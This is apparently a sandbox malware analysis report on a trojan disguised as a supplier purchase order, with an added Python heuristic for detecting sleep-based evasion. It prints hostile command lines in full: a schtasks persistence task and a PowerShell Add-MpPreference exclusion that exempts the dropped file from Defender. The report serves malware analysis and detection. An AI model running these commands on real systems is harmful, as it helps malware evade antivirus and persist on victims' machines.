Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, zThQNep4lwKpE9O0BC.cs | High entropy of concatenated method names: 'Dispose', 'IVvmVIIR1M', 'Mgyac1W0Ni', 'odZCCOH7n7', 'tmqmke9fTd', 'IOXmzWOSgt', 'ProcessDialogKey', 'KiDaowKvbu', 'J5wam7HO6p', 'EhAaalCU4s'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, yxWKBchUKSW06bE2hl.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'sL5aVpGmWE', 'E88akydsJv', 'D2ZazZa652', 'grEFot43Fo', 'HuCFmoLnNh', 'NqGFaemGDc', 'nmPFF1JFgj', 'lRlpJUbu05kK3ucJ2eT'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, jSRC5wmFTKLEbN6j3uU.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'E3QI1gbo2N', 'cBJIH5hZ68', 'vCAID9YLXY', 'WF7IXecOcY', 'Ew5IZjgmQX', 'dy2IOjm3KJ', 'NyaIG76mDc'
Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, iMftbjagvPfJN33VjN.cs | High entropy of concatenated method names: 'n7DKFjTcd', 'MQBgkVi0a', 'kjt2lIfSV', 'A6d7C0rQR', 'h2cuIApkO', 'OJHYAGyMw', 'qB7g6Rvopn3Fh7amJY', 'exSZfKGYpynCQmkJC4', 'dUr4G2dHd', 'Y8sI5EgbP'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, hp0xu9CEYuFdg9g0GR.csHigh entropy of concatenated method names: 'uHAN0Z89Li', 'w1pNpM6jW5', 'K0YNtltfjs', 'e5ENJb1olu', 'RwpNr3m8ak', 'nLBtZMs5Pu', 'whKtOcRkRB', 'rlitG6I5I2', 'bi1tyuZZMC', 'rGXtVQbxlw'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, aqe9fTydROXWOSgtfi.csHigh entropy of concatenated method names: 'uKI4Ttq2Ch', 'IEn4prwncB', 'i9P4hNexxl', 'sPN4tLbKWj', 'pNJ4NJjEN3', 'EHm4Jb0kB6', 'nH94rEtJdU', 'k7O4drI1y7', 'bqE48mhZMZ', 'F5U4lWH5UX'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, Pl9B1MLSEJ7M2ACnEo.csHigh entropy of concatenated method names: 'wwbJ99GRes', 'xjPJQYB2FZ', 'lNUJKw7CIM', 'E2UJgYmYfD', 'eVbJA8W6yd', 'JMKJ2PdaAm', 'vHuJ7tooSi', 'WxMJxRcO8o', 'ixPJuP0boK', 'Nt5JYbA1sl'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, hvqSVpzqu3tDJb0msV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GF96wMEv8d', 'zi16BBgxtZ', 'IcP6bavk3W', 'uaC6ef16Pp', 'qaV64GIiyC', 'bVE66R39uM', 'vi36IwljWQ'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, Wk3seexTX6tZtWvfvc.csHigh entropy of concatenated method names: 'gUap1I936I', 'LVtpH9Hl19', 'hUFpDcwaS5', 'KKlpXHc9wX', 'BCfpZuJceM', 'MPVpOXCWxq', 'j8xpGEymhV', 'YZfpyII8vk', 'lFBpV8QB69', 'AR3pkhOUi8'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, nCU4sZkk0cO2A8tXZc.csHigh entropy of concatenated method names: 'vyW6mKeDls', 'mTI6FV3tM9', 'JQF6qlZjZ9', 'kXF6TMnp9N', 'QQT6pgcotf', 'VEl6tMIp0X', 'mx16NArRmY', 'VZx4GpRdM5', 'L3P4yYZWRa', 'A334VX4XmO'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, A2kagZuBKmr6hPQEK1.csHigh entropy of concatenated method names: 'CxjhgV2aiq', 'mrWh2rhnVj', 'lWvhxNbcyy', 'uXIhuhBqn4', 'NcChBOZOXJ', 'D3YhbIHdd4', 'yFGheoM6is', 'JfWh4FHFYT', 'BMLh6Sin2Z', 'eouhIH49yc'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, oMIwwyvsoaXJBe3Isf.csHigh entropy of concatenated method names: 'v5xwx6xUrw', 'JYTwuRXSQq', 'NR6wCi5SUc', 'oBxwcIWNDC', 'SECwRn51D6', 'Es6wnUOcs7', 'bFtwjU1NQu', 'a2pwEdV2fU', 'AfcwMFlOhK', 'AILwPnq0Ge'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, TPnZ5FqOFg4XKETJii.csHigh entropy of concatenated method names: 'hHymJk3see', 'fX6mrtZtWv', 'UBKm8mr6hP', 'yEKml10GOG', 'I3rmBjhtp0', 'Du9mbEYuFd', 'O6JxNGNyLUgiZhCBWG', 'eyanw6kIPronvWbG9s', 'WLJmmRZBX6', 'TxZmFJOqf3'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, mqshXHrVQ97YMT4tEt.csHigh entropy of concatenated method names: 'vQlF0Xtbdf', 'mjtFTBIrUK', 'i7aFpN1waN', 'RxnFhn6v4O', 'Fu2FtJoDg8', 'yOHFNTE3l4', 'SfxFJcneKm', 'vPXFrcCMD9', 'TpVFdKGvhM', 'aqJF8EJ72u'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, UyWKgQ194m00G4siGn.csHigh entropy of concatenated method names: 'TLmBM5EW1j', 'NmqBSaWvPf', 'e6PB11gqei', 'GuFBHyCCPo', 'dYrBc2bTGj', 'SaGB3ZEH7B', 'jIEBRZlEJB', 'YNuBnrICp1', 'HowBf8pMhZ', 'fiYBjlersV'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, By6nk7mohiH0nFI8D7E.csHigh entropy of concatenated method names: 'B4N69yyWvw', 'F9H6QO3uwv', 'ihD6KZY5XZ', 'WbE6gkY5C9', 'T7F6Awd36a', 'eYt620mLUA', 'eDq67eR8X7', 'KFk6xT4DMt', 'oGl6uXvnRx', 'ATf6YgcUMK'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, EDq8ZKXlx7nTMbYoVg.csHigh entropy of concatenated method names: 'thge8r8vDf', 'EPpelhiNVV', 'ToString', 'pnweTBLsSF', 'n2Eep6EWIX', 'e1jehG3I2p', 'hK1etG8HIg', 'TTReNPVs8u', 'fbyeJrFwNd', 'cWferelp5C'
                      Source: 0.2.Supplier Purchase Order - PO0002491.exe.9850000.4.raw.unpack, qqEwOsO3tIS0TnFlkC.csHigh entropy of concatenated method names: 'h7key4dxrs', 'zSgekRjLuE', 'ja64o2TyU9', 'tm94mjFxFQ', 'eKjePuCmEE', 'V4MeSfkv68', 'TTXevjOjPp', 'QoWe1LQAls', 'twPeHCJTP5', 'hVVeDOh6Cn'
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exeCode function: 12_2_00406EEB ShellExecuteW,URLDownloadToFileW,12_2_00406EEB
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exeFile created: C:\Users\user\AppData\Roaming\keHuNxIumw.exeJump to dropped file

                      Boot Survival

                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp"
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe Code function: 12_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AADB

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe Code function: 12_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CBE1
                      Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                       Source: Yara match | File source: Process Memory Space: Supplier Purchase Order - PO0002491.exe PID: 1868, type: MEMORYSTR
                       Source: Yara match | File source: Process Memory Space: keHuNxIumw.exe PID: 1436, type: MEMORYSTR
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0040F7E2 Sleep,ExitProcess,12_2_0040F7E2
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Memory allocated: 19F0000 memory reserve | memory write watch
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Memory allocated: 3370000 memory reserve | memory write watch
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Memory allocated: 5370000 memory reserve | memory write watch
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Memory allocated: 9A10000 memory reserve | memory write watch
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Memory allocated: AA10000 memory reserve | memory write watch
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Memory allocated: AC30000 memory reserve | memory write watch
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Memory allocated: BC30000 memory reserve | memory write watch
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Memory allocated: EE0000 memory reserve | memory write watch
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Memory allocated: 2AF0000 memory reserve | memory write watch
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Memory allocated: 2850000 memory reserve | memory write watch
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Memory allocated: 8E80000 memory reserve | memory write watch
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Memory allocated: 74A0000 memory reserve | memory write watch
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Memory allocated: 9E80000 memory reserve | memory write watch
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Memory allocated: AE80000 memory reserve | memory write watch
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_0041A7D9
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Thread delayed: delay time: 922337203685477
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Thread delayed: delay time: 922337203685477
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7840
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1754
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Window / User API: threadDelayed 368
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Window / User API: threadDelayed 9624
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | API coverage: 6.1 %
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe TID: 5300 | Thread sleep time: -922337203685477s >= -30000s
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5580 | Thread sleep time: -8301034833169293s >= -30000s
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe TID: 6616 | Thread sleep count: 368 > 30
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe TID: 6616 | Thread sleep time: -1104000s >= -30000s
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe TID: 6616 | Thread sleep count: 9624 > 30
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe TID: 6616 | Thread sleep time: -28872000s >= -30000s
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe TID: 6052 | Thread sleep time: -922337203685477s >= -30000s
                       Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                       Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0040928E
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0041C322
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0040C388
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_004096A0
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_00408847
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00407877 FindFirstFileW,FindNextFileW,12_2_00407877
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0044E8F9 FindFirstFileExA,12_2_0044E8F9
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040BB6B
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00419B86
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040BD72
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00407CD2
                       Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000D13000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00434A8A
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,12_2_0041CBE1
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00443355 mov eax, dword ptr fs:[00000030h] 12_2_00443355
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_004120B2 GetProcessHeap,HeapFree,12_2_004120B2
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_0043503C
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0043BB71
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00434BD8 SetUnhandledExceptionFilter,12_2_00434BD8
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Memory allocated: page read and write | page guard
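The sleep figures in this section are consistent with millisecond values despite the "s" suffix in the report's wording: thread 6616's 368 sleeps total 1104000 (368 x 3000 ms), and 922337203685477 is TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks / 10,000), i.e. a wait that never returns. The Python below is an added example, not Joe Sandbox code, that reproduces the shape of this per-thread heuristic over a constructed trace; the "<pid> <tid> <Api>(<arg>)" line format and the 30-call / 30000 ms thresholds are assumptions read off the report's own findings.

```python
"""Sleep-loop sandbox-evasion heuristic over a constructed API trace.

Added example: not Joe Sandbox code. Assumes trace lines of the form
"<pid> <tid> <Api>(<arg>)"; thresholds mirror the report's wording.
"""
import re
from collections import defaultdict

# TimeSpan.MaxValue in milliseconds (Int64.MaxValue ticks / 10,000 ticks per ms):
# the value a .NET wait on TimeSpan.MaxValue shows up as in the trace.
INFINITE_SLEEP_MS = 922_337_203_685_477

MAX_SLEEP_CALLS = 30         # assumed threshold, read off the report's "> 30"
MAX_TOTAL_SLEEP_MS = 30_000  # assumed threshold, read off the report's ">= 30000"

_LINE = re.compile(r"^(?P<pid>\d+)\s+(?P<tid>\d+)\s+(?P<api>\w+)\((?P<arg>\d+)\)$")


def build_trace():
    """Constructed trace modelled on the report's figures (not real sandbox output)."""
    lines = []
    # Thread 6616: a 3 s sleep inside a loop, 368 iterations = 1,104,000 ms.
    lines += ["1868 6616 Sleep(3000)"] * 368
    # Thread 5300: one effectively infinite wait.
    lines.append(f"1868 5300 Sleep({INFINITE_SLEEP_MS})")
    # Control thread: a few short waits that must not be flagged.
    lines += ["1868 7000 Sleep(50)"] * 5
    # Non-sleep calls are ignored by the heuristic.
    lines.append("1868 7000 GetTickCount(0)")
    return lines


def summarize_sleeps(lines):
    """Per (pid, tid): number of Sleep calls and total requested delay in ms."""
    stats = defaultdict(lambda: {"count": 0, "total_ms": 0})
    for line in lines:
        m = _LINE.match(line)
        if not m or m["api"] != "Sleep":
            continue
        key = (int(m["pid"]), int(m["tid"]))
        stats[key]["count"] += 1
        stats[key]["total_ms"] += int(m["arg"])
    return dict(stats)


def evasion_findings(stats):
    """Report-style findings for threads that exceed either threshold."""
    findings = []
    for (pid, tid), s in sorted(stats.items()):
        if s["count"] > MAX_SLEEP_CALLS:
            findings.append(f"PID {pid} TID {tid}: Thread sleep count: {s['count']} > {MAX_SLEEP_CALLS}")
        if s["total_ms"] >= MAX_TOTAL_SLEEP_MS:
            findings.append(f"PID {pid} TID {tid}: Thread sleep time: {s['total_ms']}ms >= {MAX_TOTAL_SLEEP_MS}ms")
        if s["total_ms"] >= INFINITE_SLEEP_MS:
            findings.append(f"PID {pid} TID {tid}: wait equals TimeSpan.MaxValue (thread never resumes)")
    return findings


if __name__ == "__main__":
    for finding in evasion_findings(summarize_sleeps(build_trace())):
        print(finding)
```

The count threshold and the total-time threshold catch different tricks: many short sleeps (the loop on thread 6616) trip the count rule even when each call is far below any single-call limit, while a single huge sleep trips the total rule without ever exceeding the call count. A sandbox that only patches long Sleep calls to return early still needs the count rule.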

                      HIPS / PFW / Operating System Protection Evasion

                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Memory written: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe base: 400000 value starts with: 4D5A
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Memory written: C:\Users\user\AppData\Roaming\keHuNxIumw.exe base: 400000 value starts with: 4D5A
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 12_2_00412132
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00419662 mouse_event,12_2_00419662
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmp9421.tmp"
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Process created: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe "C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe"
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\keHuNxIumw" /XML "C:\Users\user\AppData\Local\Temp\tmpB43C.tmp"
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Process created: C:\Users\user\AppData\Roaming\keHuNxIumw.exe "C:\Users\user\AppData\Roaming\keHuNxIumw.exe"
                       Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerG
                       Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
                       Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager.
                       Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerX
                       Source: Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, Supplier Purchase Order - PO0002491.exe, 00000007.00000002.4560625385.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: 12_2_00434CB6 cpuid 12_2_00434CB6
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: EnumSystemLocalesW,12_2_0045201B
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: EnumSystemLocalesW,12_2_004520B6
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_00452143
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: GetLocaleInfoW,12_2_00452393
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: EnumSystemLocalesW,12_2_00448484
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_004524BC
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: GetLocaleInfoW,12_2_004525C3
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_00452690
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: GetLocaleInfoW,12_2_0044896D
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: GetLocaleInfoA,12_2_0040F90C
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_00451D58
                       Source: C:\Users\user\AppData\Roaming\keHuNxIumw.exe | Code function: EnumSystemLocalesW,12_2_00451FD0
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Queries volume information: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe VolumeInformation
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                       Source: C:\Users\user\Desktop\Supplier Purchase Order - PO0002491.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                       Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
